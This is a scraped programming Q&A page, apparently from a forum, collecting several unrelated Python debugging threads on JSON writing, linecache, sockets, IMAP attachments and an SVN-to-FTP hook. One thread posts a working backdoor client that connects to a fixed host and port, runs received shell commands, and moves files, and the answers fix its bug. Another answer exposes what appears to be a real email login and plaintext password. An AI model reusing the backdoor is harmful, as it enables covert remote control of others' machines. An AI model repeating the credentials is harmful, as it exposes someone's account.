Python writes empty json file - python

I'm working on a console app in python. I have a command that should save the program state as a json file, but when I write the file, it's empty. The result of .as_list() here is a list containing an arbitrary 3-lists.
class SaveCommand():
def __init__(self, console):
self.console = console
def execute(self, args):
if self.console.combat is None:
raise ConsoleCommandException("there is no active combat")
if len(args) != 1:
raise ConsoleCommandException("save [save name]")
try:
with open("save_files/" + args[0] + ".json", "w") as outfile:
json.dumps(self.console.combat.as_list(), outfile)
except Exception:
raise ConsoleCommandException("save failed: unknown error")
print("successfully saved \"" + args[0] + "\"")

json.dumps doesn't write a file, it returns the string serialized as JSON. You're looking for json.dump. Notice the missing fp param for dumps.

Related

whenever i run this it give me TypeError: can only concatenate str (not "bytes") to str and i don't know how to fix it?

def reliable_receive(self):
json_data = ""
while True:
try:
json_data = json_data + self.connection.recv(1024)
return json.loads(json_data)
except ValueError:
continue
def execute_system_commmand(self,command):
return subprocess.check_output(command,shell=True)
def change_working_directory_to(self,path):
os.chdir(path)
return "[+] Change working directory to " + path
def write_file(self,path,content):
with open(path,"wb") as file:
file.write(base64.b64decode(content))
return "[+] Upload Succesful"
def read_file(self,path):
with open(path,"rb") as file:
return base64.b64encode(file.read())
def run(self):
while True:
command = self.reliable_receive()
try:
if command[0] == "exit":
self.connection.close()
sys.exit()
elif command[0] == "cd" and len(command) > 1:
command_result = self.change_working_directory_to(command[1])
elif command[0] == "download":
command_result = self.read_file(command[1])
elif command[0] == "upload":
command_result = self.write_file(command[1],command[2])
else:
command_result = self.execute_system_commmand(command)
except Exception:
command_result = "[-]Error during command Execution"
self.reliable_send(command_result)
my_backdoor = Backdoor("10.0.2.22",4444)
my_backdoor.run()
** whenever i run this it give me TypeError: can only concatenate str (not "bytes") to str and i don't know how to fix it ? but this same code run in my virtual machine. I probably know that its silly mistake but didn't see that. Can you help me to fix this problem **
Traceback (most recent call last):
File "backdoor.py", line 73, in <module>
my_backdoor.run()
File "backdoor.py", line 50, in run
command = self.reliable_receive()
File "backdoor.py", line 25, in reliable_receive
json_data = json_data + self.connection.recv(1024)
TypeError: can only concatenate str (not "bytes") to str
When sending data in sockets the string is encoded str.encode().
So when you receive it, it is encoded in a bytes object and must run
bytes_object.decode(way_bytes_object_was_encoded)
In your case:
json_data = json_data + self.connection.recv(1024).decode(method_used_to_encode)
method_used_to_encode is usually
“utf-8”
Ensure that you do not have any variable named “str” in this scope.
PROBLEM: You initialised json_data as a string, then tried to add a serialized json string to it as if it were an actual string, which is not possible as a serialized object by json is a bytes-object.
SOLUTION:
def reliable_receive(self):
while True:
try:
json_data = self.connection.recv(1024)
return json.loads(json_data) # Deserializes object from json string received.
except ValueError as e:
print(e) # Prints if there is an error? Not sure if you need this, but if there is a ValueError you will be stuck in an infinite loop of nothingness.
This should fix your issue.

python 2.6 linecache.getline() and stdin. How does it work?

I have a script which runs through lines of input to find the occurrence of an ID string while keeping track of the linenumber.
Then it runs backwards up the input to trace parentID/childID relationships. The script accepts either a logfile using a '-f' flag as an argument or the contents of stdin from a pipe.
The logfile as input portion works just fine, but reading from stdin seems not to work.
For the sake of reasonable clarity I've included the portion of the script that this concerns, but don't expect to be able to run it. It's just to show you sorta whats going on (anyone who works in financial services around FIX protocol would recognize a few things):
import os
import sys
import linecache
from types import *
from ____ import FixMessage # custom message class that is used throughout
# Feel free to ignore all the getArgs and validation crap
def getArgs():
import argparse
parser = argparse.ArgumentParser(
description='Get amendment history.')
parser.add_argument('-f', '--file',
help="input logfile.'")
args = parser.parse_args()
return validateArgs(args)
def validateArgs(args):
try:
if sys.stdin.isatty():
if args.file:
assert os.path.isfile(args.file.strip('\n')), \
'File "{0}" does not exist'.format(args.file)
args.file = open(args.file, 'r')
else:
args.file = sys.stdin
assert args.file, \
"Please either include a file with '-f' or pipe some text in"
except AssertionError as err:
print err
exit(1)
return args
defGetMessageTrail(logfile, orderId):
# some input validation
if isinstance(logfile, StringType):
try: logfile = open(logfile, 'r')
except IOError as err: exit(1)
elif not isinstance(logfile, FileType):
raise TypeError(
'Expected FileType and got {0}'.format(type(logfile)))
linenum = 0
# This retrieves the message containing the orderID as well as the linenum
for line in logfile:
linenum += 1
if orderId in line:
# FixMessage is a custom class that is treated here like
# a dictionary with some metadata
# Missing dict keys return 'None'
# .isvalid is bool results of some text validation
# .direction is either incoming or outgoing
# thats all you really need to know
msg = FixMessage(line)
if msg.isvalid and msg.direction == 'Incoming':
yield msg
break
# If there is a message parentID, it would be in msg['41']
if msg['41']:
messages = findParentMessages(logfile, startline=linenum, msg['41'])
for msg in messages: yield msg
def findParentMessages(logfile, startline, targetId):
# Some more input validation
assert isinstance(logfile, FileType)
assert isinstance(startline, IntType)
assert isinstance(targetId, StringType)
# should just make a integer decrementing generator,
# but this is fine for the example
for linenum in range(startline)[::-1]:
# *** This is where the question lies... ***
# print(logfile.name) # returns "<stdin>"
line = linecache.getline(logfile.name, linenum)
if 'Incoming' in line and '11=' + targetId in line:
msg = FixMessage(line)
yield msg
if msg['41']: findParentMessages(logfile, linenum, msg['41'])
else: break
def main():
log = getArgs().file
trail = getMessageTrail(log, 'ORDER123')
if __name__ == '__main__': main()
The question is, how does linecache.getline work when it comes to reading stdin as a file? is it different than how it would work if given a regular filename?
linecache.getline() accepts a file name, not a file object. It is not designed to work that way as filename is passed to calls like open() and os.stat().
For reference: https://github.com/python/cpython/blob/2.6/Lib/linecache.py

Sending a string to client- receiving a TypeError

I'm trying to send an image to the client, so I have converted the image into a string. Here is my code:
def send_image_to_client(file_name, client_socket):
"""sends an image to the client"""
with open(file_name, "rb") as im:
string = base64.b64encode(im.read()) # convert image into a string
print "sending image..."
client_socket.send(string)
return
For some reason, I get the following error:
send() argument 1 must be string or buffer, not None
What am I doing wrong?
This example shows the same error:
def show_content(directory, client_socket):
"""displays the content of a given directory"""
import glob
files_list = glob.glob(directory+"\*.*")
files_list[-1] += "--"
for address in files_list:
if address:
send_response_to_client(address+"*", client_socket)
return
The above code is really the code that you are trying or you have done any cleanup before posting it here?
You can try this -
with open(file_name, "rb") as im:
string = base64.b64encode(im.read()) # convert image into a string
print "sending image..."
print(type(string))
if (string):
client_socket.send(string.encode())
else:
print("No Data received from base64encode")
return

Python Script for downloading new email attachments using imap

import email
import imaplib
import os
class FetchEmail():
connection = None
error = None
mail_server="outlook.office365.com"
username="me#domain.com"
password="'Password'"
self.save_attachment(self,msg,download_folder)
def __init__(self, mail_server, username, password):
self.connection = imaplib.IMAP4_SSL(mail_server)
self.connection.login(username, password)
self.connection.select(readonly=False) # so we can mark mails as read
def close_connection(self):
"""
Close the connection to the IMAP server
"""
self.connection.close()
def save_attachment(self, msg, download_folder="/tmp"):
"""
Given a message, save its attachments to the specified
download folder (default is /tmp)
return: file path to attachment
"""
att_path = "No attachment found."
for part in msg.walk():
if part.get_content_maintype() == 'multipart':
continue
if part.get('Content-Disposition') is None:
continue
filename = part.get_filename()
att_path = os.path.join(download_folder, filename)
if not os.path.isfile(att_path):
fp = open(att_path, 'wb')
fp.write(part.get_payload(decode=True))
fp.close()
return att_path
def fetch_unread_messages(self):
"""
Retrieve unread messages
"""
emails = []
(result, messages) = self.connection.search(None, 'UnSeen')
if result == "OK":
for message in messages[0].split(' '):
try:
ret, data = self.connection.fetch(message,'(RFC822)')
except:
print ("No new emails to read.")
self.close_connection()
exit()
msg = email.message_from_string(data[0][1])
if isinstance(msg, str) == False:
emails.append(msg)
response, data = self.connection.store(message, '+FLAGS','\\Seen')
return emails
self.error = "Failed to retreive emails."
return emails
I have the above code currently, and at line 12 it says self is not defined. What could be the reason for this error. I think self is defined below that line in the init function.
Well, just by looking at the code, I can see inconsistent indentation right from the start - this is probably your main problem. Try defining your functions within the FetchEmail class.
Secondly, change the init function to:
def __init__(self, mail_server=mail_server,
username=username,
password=password):
this is effectively just applying default values to the init function.
Lastly, to us the save_attachment function /save_attachment(self, msg, download_folder) within the class, you will either need to call it within the init function or within the top-level of the scipt (outside the class definition)
Within class definition (within init): self.save_attatchment(msg,download_folder)
Within top level: after creating an FetchEmail object using fe = FetchEmail() then you could call the save_attachment function like this: attatchment_path = fe.save_attachment()
This is how I would implement the init:
class FetchEmail():
def __init__(self,
mail_server="outlook.office365.com",
username="rnandipati#jmawireless.com",
password="'RNjma17!'"):
self.error = None
self.connection = None
self.mail_server = mail_server
self.username = username
self.password = password
self.connection = imaplib.IMAP4_SSL(mail_server)
self.connection.login(username, password)
self.connection.select(readonly=False) # so we can mark mails as readread
def close_connection(self): ...
just take note, if you do this, just remember to change the reference of all your functions to self.password, self.error etc.
I do not know whether this would work.
Maybe take a look at this. I think it is your best bet.
All the best!

Python script is exiting with no output and I have no idea why

I'm attempting to debug a Subversion post-commit hook that calls some python scripts. What I've been able to determine so far is that when I run post-commit.bat manually (I've created a wrapper for it to make it easier) everything succeeds, but when SVN runs it one particular step doesn't work.
We're using CollabNet SVNServe, which I know from the documentation removes all environment variables. This had caused some problems earlier, but shouldn't be an issue now.
Before Subversion calls a hook script, it removes all variables - including $PATH on Unix, and %PATH% on Windows - from the environment. Therefore, your script can only run another program if you spell out that program's absolute name.
The relevant portion of post-commit.bat is:
echo -------------------------- >> c:\svn-repos\company\hooks\svn2ftp.out.log
set SITENAME=staging
set SVNPATH=branches/staging/wwwroot/
"C:\Python3\python.exe" C:\svn-repos\company\hooks\svn2ftp.py ^
--svnUser="svnusername" ^
--svnPass="svnpassword" ^
--ftp-user=ftpuser ^
--ftp-password=ftppassword ^
--ftp-remote-dir=/ ^
--access-url=svn://10.0.100.6/company ^
--status-file="C:\svn-repos\company\hooks\svn2ftp-%SITENAME%.dat" ^
--project-directory=%SVNPATH% "staging.company.com" %1 %2 >> c:\svn-repos\company\hooks\svn2ftp.out.log
echo -------------------------- >> c:\svn-repos\company\hooks\svn2ftp.out.log
When I run post-commit.bat manually, for example: post-commit c:\svn-repos\company 12345, I see output like the following in svn2ftp.out.log:
--------------------------
args1: c:\svn-repos\company
args0: staging.company.com
abspath: c:\svn-repos\company
project_dir: branches/staging/wwwroot/
local_repos_path: c:\svn-repos\company
getting youngest revision...
done, up-to-date
--------------------------
However, when I commit something to the repo and it runs automatically, the output is:
--------------------------
--------------------------
svn2ftp.py is a bit long, so I apologize but here goes. I'll have some notes/disclaimers about its contents below it.
#!/usr/bin/env python
"""Usage: svn2ftp.py [OPTION...] FTP-HOST REPOS-PATH
Upload to FTP-HOST changes committed to the Subversion repository at
REPOS-PATH. Uses svn diff --summarize to only propagate the changed files
Options:
-?, --help Show this help message.
-u, --ftp-user=USER The username for the FTP server. Default: 'anonymous'
-p, --ftp-password=P The password for the FTP server. Default: '#'
-P, --ftp-port=X Port number for the FTP server. Default: 21
-r, --ftp-remote-dir=DIR The remote directory that is expected to resemble the
repository project directory
-a, --access-url=URL This is the URL that should be used when trying to SVN
export files so that they can be uploaded to the FTP
server
-s, --status-file=PATH Required. This script needs to store the last
successful revision that was transferred to the
server. PATH is the location of this file.
-d, --project-directory=DIR If the project you are interested in sending to
the FTP server is not under the root of the
repository (/), set this parameter.
Example: -d 'project1/trunk/'
This should NOT start with a '/'.
2008.5.2 CKS
Fixed possible Windows-related bug with tempfile, where the script didn't have
permission to write to the tempfile. Replaced this with a open()-created file
created in the CWD.
2008.5.13 CKS
Added error logging. Added exception for file-not-found errors when deleting files.
2008.5.14 CKS
Change file open to 'rb' mode, to prevent Python's universal newline support from
stripping CR characters, causing later comparisons between FTP and SVN to report changes.
"""
try:
import sys, os
import logging
logging.basicConfig(
level=logging.DEBUG,
format='%(asctime)s %(levelname)s %(message)s',
filename='svn2ftp.debug.log',
filemode='a'
)
console = logging.StreamHandler()
console.setLevel(logging.ERROR)
logging.getLogger('').addHandler(console)
import getopt, tempfile, smtplib, traceback, subprocess
from io import StringIO
import pysvn
import ftplib
import inspect
except Exception as e:
logging.error(e)
#capture the location of the error
frame = inspect.currentframe()
stack_trace = traceback.format_stack(frame)
logging.debug(stack_trace)
print(stack_trace)
#end capture
sys.exit(1)
#defaults
host = ""
user = "anonymous"
password = "#"
port = 21
repo_path = ""
local_repos_path = ""
status_file = ""
project_directory = ""
remote_base_directory = ""
toAddrs = "developers#company.com"
youngest_revision = ""
def email(toAddrs, message, subject, fromAddr='autonote#company.com'):
headers = "From: %s\r\nTo: %s\r\nSubject: %s\r\n\r\n" % (fromAddr, toAddrs, subject)
message = headers + message
logging.info('sending email to %s...' % toAddrs)
server = smtplib.SMTP('smtp.company.com')
server.set_debuglevel(1)
server.sendmail(fromAddr, toAddrs, message)
server.quit()
logging.info('email sent')
def captureErrorMessage(e):
sout = StringIO()
traceback.print_exc(file=sout)
errorMessage = '\n'+('*'*80)+('\n%s'%e)+('\n%s\n'%sout.getvalue())+('*'*80)
return errorMessage
def usage_and_exit(errmsg):
"""Print a usage message, plus an ERRMSG (if provided), then exit.
If ERRMSG is provided, the usage message is printed to stderr and
the script exits with a non-zero error code. Otherwise, the usage
message goes to stdout, and the script exits with a zero
errorcode."""
if errmsg is None:
stream = sys.stdout
else:
stream = sys.stderr
print(__doc__, file=stream)
if errmsg:
print("\nError: %s" % (errmsg), file=stream)
sys.exit(2)
sys.exit(0)
def read_args():
global host
global user
global password
global port
global repo_path
global local_repos_path
global status_file
global project_directory
global remote_base_directory
global youngest_revision
try:
opts, args = getopt.gnu_getopt(sys.argv[1:], "?u:p:P:r:a:s:d:SU:SP:",
["help",
"ftp-user=",
"ftp-password=",
"ftp-port=",
"ftp-remote-dir=",
"access-url=",
"status-file=",
"project-directory=",
"svnUser=",
"svnPass="
])
except getopt.GetoptError as msg:
usage_and_exit(msg)
for opt, arg in opts:
if opt in ("-?", "--help"):
usage_and_exit()
elif opt in ("-u", "--ftp-user"):
user = arg
elif opt in ("-p", "--ftp-password"):
password = arg
elif opt in ("-SU", "--svnUser"):
svnUser = arg
elif opt in ("-SP", "--svnPass"):
svnPass = arg
elif opt in ("-P", "--ftp-port"):
try:
port = int(arg)
except ValueError as msg:
usage_and_exit("Invalid value '%s' for --ftp-port." % (arg))
if port < 1 or port > 65535:
usage_and_exit("Value for --ftp-port must be a positive integer less than 65536.")
elif opt in ("-r", "--ftp-remote-dir"):
remote_base_directory = arg
elif opt in ("-a", "--access-url"):
repo_path = arg
elif opt in ("-s", "--status-file"):
status_file = os.path.abspath(arg)
elif opt in ("-d", "--project-directory"):
project_directory = arg
if len(args) != 3:
print(str(args))
usage_and_exit("host and/or local_repos_path not specified (" + len(args) + ")")
host = args[0]
print("args1: " + args[1])
print("args0: " + args[0])
print("abspath: " + os.path.abspath(args[1]))
local_repos_path = os.path.abspath(args[1])
print('project_dir:',project_directory)
youngest_revision = int(args[2])
if status_file == "" : usage_and_exit("No status file specified")
def main():
global host
global user
global password
global port
global repo_path
global local_repos_path
global status_file
global project_directory
global remote_base_directory
global youngest_revision
read_args()
#repository,fs_ptr
#get youngest revision
print("local_repos_path: " + local_repos_path)
print('getting youngest revision...')
#youngest_revision = fs.youngest_rev(fs_ptr)
assert youngest_revision, "Unable to lookup youngest revision."
last_sent_revision = get_last_revision()
if youngest_revision == last_sent_revision:
# no need to continue. we should be up to date.
print('done, up-to-date')
return
if last_sent_revision or youngest_revision < 10:
# Only compare revisions if the DAT file contains a valid
# revision number. Otherwise we risk waiting forever while
# we parse and uploading every revision in the repo in the case
# where a repository is retroactively configured to sync with ftp.
pysvn_client = pysvn.Client()
pysvn_client.callback_get_login = get_login
rev1 = pysvn.Revision(pysvn.opt_revision_kind.number, last_sent_revision)
rev2 = pysvn.Revision(pysvn.opt_revision_kind.number, youngest_revision)
summary = pysvn_client.diff_summarize(repo_path, rev1, repo_path, rev2, True, False)
print('summary len:',len(summary))
if len(summary) > 0 :
print('connecting to %s...' % host)
ftp = FTPClient(host, user, password)
print('connected to %s' % host)
ftp.base_path = remote_base_directory
print('set remote base directory to %s' % remote_base_directory)
#iterate through all the differences between revisions
for change in summary :
#determine whether the path of the change is relevant to the path that is being sent, and modify the path as appropriate.
print('change path:',change.path)
ftp_relative_path = apply_basedir(change.path)
print('ftp rel path:',ftp_relative_path)
#only try to sync path if the path is in our project_directory
if ftp_relative_path != "" :
is_file = (change.node_kind == pysvn.node_kind.file)
if str(change.summarize_kind) == "delete" :
print("deleting: " + ftp_relative_path)
try:
ftp.delete_path("/" + ftp_relative_path, is_file)
except ftplib.error_perm as e:
if 'cannot find the' in str(e) or 'not found' in str(e):
# Log, but otherwise ignore path-not-found errors
# when deleting, since it's not a disaster if the file
# we want to delete is already gone.
logging.error(captureErrorMessage(e))
else:
raise
elif str(change.summarize_kind) == "added" or str(change.summarize_kind) == "modified" :
local_file = ""
if is_file :
local_file = svn_export_temp(pysvn_client, repo_path, rev2, change.path)
print("uploading file: " + ftp_relative_path)
ftp.upload_path("/" + ftp_relative_path, is_file, local_file)
if is_file :
os.remove(local_file)
elif str(change.summarize_kind) == "normal" :
print("skipping 'normal' element: " + ftp_relative_path)
else :
raise str("Unknown change summarize kind: " + str(change.summarize_kind) + ", path: " + ftp_relative_path)
ftp.close()
#write back the last revision that was synced
print("writing last revision: " + str(youngest_revision))
set_last_revision(youngest_revision) # todo: undo
def get_login(a,b,c,d):
#arguments don't matter, we're always going to return the same thing
try:
return True, "svnUsername", "svnPassword", True
except Exception as e:
logging.error(e)
#capture the location of the error
frame = inspect.currentframe()
stack_trace = traceback.format_stack(frame)
logging.debug(stack_trace)
#end capture
sys.exit(1)
#functions for persisting the last successfully synced revision
def get_last_revision():
if os.path.isfile(status_file) :
f=open(status_file, 'r')
line = f.readline()
f.close()
try: i = int(line)
except ValueError:
i = 0
else:
i = 0
f = open(status_file, 'w')
f.write(str(i))
f.close()
return i
def set_last_revision(rev) :
f = open(status_file, 'w')
f.write(str(rev))
f.close()
#augmented ftp client class that can work off a base directory
class FTPClient(ftplib.FTP) :
def __init__(self, host, username, password) :
self.base_path = ""
self.current_path = ""
ftplib.FTP.__init__(self, host, username, password)
def cwd(self, path) :
debug_path = path
if self.current_path == "" :
self.current_path = self.pwd()
print("pwd: " + self.current_path)
if not os.path.isabs(path) :
debug_path = self.base_path + "<" + path
path = os.path.join(self.current_path, path)
elif self.base_path != "" :
debug_path = self.base_path + ">" + path.lstrip("/")
path = os.path.join(self.base_path, path.lstrip("/"))
path = os.path.normpath(path)
#by this point the path should be absolute.
if path != self.current_path :
print("change from " + self.current_path + " to " + debug_path)
ftplib.FTP.cwd(self, path)
self.current_path = path
else :
print("staying put : " + self.current_path)
def cd_or_create(self, path) :
assert os.path.isabs(path), "absolute path expected (" + path + ")"
try: self.cwd(path)
except ftplib.error_perm as e:
for folder in path.split('/'):
if folder == "" :
self.cwd("/")
continue
try: self.cwd(folder)
except:
print("mkd: (" + path + "):" + folder)
self.mkd(folder)
self.cwd(folder)
def upload_path(self, path, is_file, local_path) :
if is_file:
(path, filename) = os.path.split(path)
self.cd_or_create(path)
# Use read-binary to avoid universal newline support from stripping CR characters.
f = open(local_path, 'rb')
self.storbinary("STOR " + filename, f)
f.close()
else:
self.cd_or_create(path)
def delete_path(self, path, is_file) :
(path, filename) = os.path.split(path)
print("trying to delete: " + path + ", " + filename)
self.cwd(path)
try:
if is_file :
self.delete(filename)
else:
self.delete_path_recursive(filename)
except ftplib.error_perm as e:
if 'The system cannot find the' in str(e) or '550 File not found' in str(e):
# Log, but otherwise ignore path-not-found errors
# when deleting, since it's not a disaster if the file
# we want to delete is already gone.
logging.error(captureErrorMessage(e))
else:
raise
def delete_path_recursive(self, path):
if path == "/" :
raise "WARNING: trying to delete '/'!"
for node in self.nlst(path) :
if node == path :
#it's a file. delete and return
self.delete(path)
return
if node != "." and node != ".." :
self.delete_path_recursive(os.path.join(path, node))
try: self.rmd(path)
except ftplib.error_perm as msg :
sys.stderr.write("Error deleting directory " + os.path.join(self.current_path, path) + " : " + str(msg))
# apply the project_directory setting
def apply_basedir(path) :
#remove any leading stuff (in this case, "trunk/") and decide whether file should be propagated
if not path.startswith(project_directory) :
return ""
return path.replace(project_directory, "", 1)
def svn_export_temp(pysvn_client, base_path, rev, path) :
# Causes access denied error. Couldn't deduce Windows-perm issue.
# It's possible Python isn't garbage-collecting the open file-handle in time for pysvn to re-open it.
# Regardless, just generating a simple filename seems to work.
#(fd, dest_path) = tempfile.mkstemp()
dest_path = tmpName = '%s.tmp' % __file__
exportPath = os.path.join(base_path, path).replace('\\','/')
print('exporting %s to %s' % (exportPath, dest_path))
pysvn_client.export( exportPath,
dest_path,
force=False,
revision=rev,
native_eol=None,
ignore_externals=False,
recurse=True,
peg_revision=rev )
return dest_path
if __name__ == "__main__":
logging.info('svnftp.start')
try:
main()
logging.info('svnftp.done')
except Exception as e:
# capture the location of the error for debug purposes
frame = inspect.currentframe()
stack_trace = traceback.format_stack(frame)
logging.debug(stack_trace[:-1])
print(stack_trace)
# end capture
error_text = '\nFATAL EXCEPTION!!!\n'+captureErrorMessage(e)
subject = "ALERT: SVN2FTP Error"
message = """An Error occurred while trying to FTP an SVN commit.
repo_path = %(repo_path)s\n
local_repos_path = %(local_repos_path)s\n
project_directory = %(project_directory)s\n
remote_base_directory = %(remote_base_directory)s\n
error_text = %(error_text)s
""" % globals()
email(toAddrs, message, subject)
logging.error(e)
Notes/Disclaimers:
I have basically no python training so I'm learning as I go and spending lots of time reading docs to figure stuff out.
The body of get_login is in a try block because I was getting strange errors saying there was an unhandled exception in callback_get_login. Never figured out why, but it seems fine now. Let sleeping dogs lie, right?
The username and password for get_login are currently hard-coded (but correct) just to eliminate variables and try to change as little as possible at once. (I added the svnuser and svnpass arguments to the existing argument parsing.)
So that's where I am. I can't figure out why on earth it's not printing anything into svn2ftp.out.log. If you're wondering, the output for one of these failed attempts in svn2ftp.debug.log is:
2012-09-06 15:18:12,496 INFO svnftp.start
2012-09-06 15:18:12,496 INFO svnftp.done
And it's no different on a successful run. So there's nothing useful being logged.
I'm lost. I've gone way down the rabbit hole on this one, and don't know where to go from here. Any ideas?
It looks as if you are overwriting your logging level. Try setting both to DEBUG and see what happens.
import sys, os
import logging
logging.basicConfig(
level=logging.DEBUG, # DEBUG here
format='%(asctime)s %(levelname)s %(message)s',
filename='svn2ftp.debug.log',
filemode='a'
)
console = logging.StreamHandler()
console.setLevel(logging.ERROR) # ERROR here
logging.getLogger('').addHandler(console)
Additionally you are printing in some places and logging in others. I am not sure that the logging library automatically redirects sys.stdout to the logging console. I would convert all print statements to logging statements to be consistent.

Categories